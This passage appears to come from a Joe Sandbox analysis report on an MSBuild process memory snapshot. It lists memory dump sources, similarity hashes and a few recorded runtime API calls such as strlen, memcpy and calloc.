                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                        • String ID: '8ol
                                                                                        • API String ID: 1521942269-2428020392
                                                                                        • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                        • Instruction ID: 2f64a8f609eebc25983a0e1082c99bb21639570ee83175f43e3dbdd2e278e4ee
                                                                                        • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                        • Instruction Fuzzy Hash: EEF09C3260112467DB104E6A9D4075336DDAB457FDF250271DD38CBB91E6B1DC02C6F5
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$calloc
                                                                                        • String ID:
                                                                                        • API String ID: 3339632435-0
                                                                                        • Opcode ID: d8d179b2a041a6eda907c8ec9446b0d1fd0298b4bb0194298672ae045629ab6a
                                                                                        • Instruction ID: bfb7a40ed15f9b4772ccc8ff9b1b231af3686a0d204c0b52f0c27ed41ccfd4c3
                                                                                        • Opcode Fuzzy Hash: d8d179b2a041a6eda907c8ec9446b0d1fd0298b4bb0194298672ae045629ab6a
                                                                                        • Instruction Fuzzy Hash: 5F31087164A3858BDB105F7CD4442A977B4BF0E308F11467AD888C7A21DF34D087DB99
                                                                                        APIs
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C63A468,00000000), ref: 6C63A4F9
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C63A468,00000000), ref: 6C63A51B
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C63A468,?,6C63A468,00000000), ref: 6C63A545
                                                                                        • memcpy.VCRUNTIME140(00000001,6C63A468,00000001,?,?,?,6C63A468,00000000), ref: 6C63A57D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3396830738-0
                                                                                        • Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
                                                                                        • Instruction ID: e20dce63bbdac6e90c8b37e193f772a6d5a4f20201ef416c3106546ad3270085
                                                                                        • Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
                                                                                        • Instruction Fuzzy Hash: FA1106F3D0032557DF0089F99C856EB7799AF95278F281234ED28877C1F635990882F1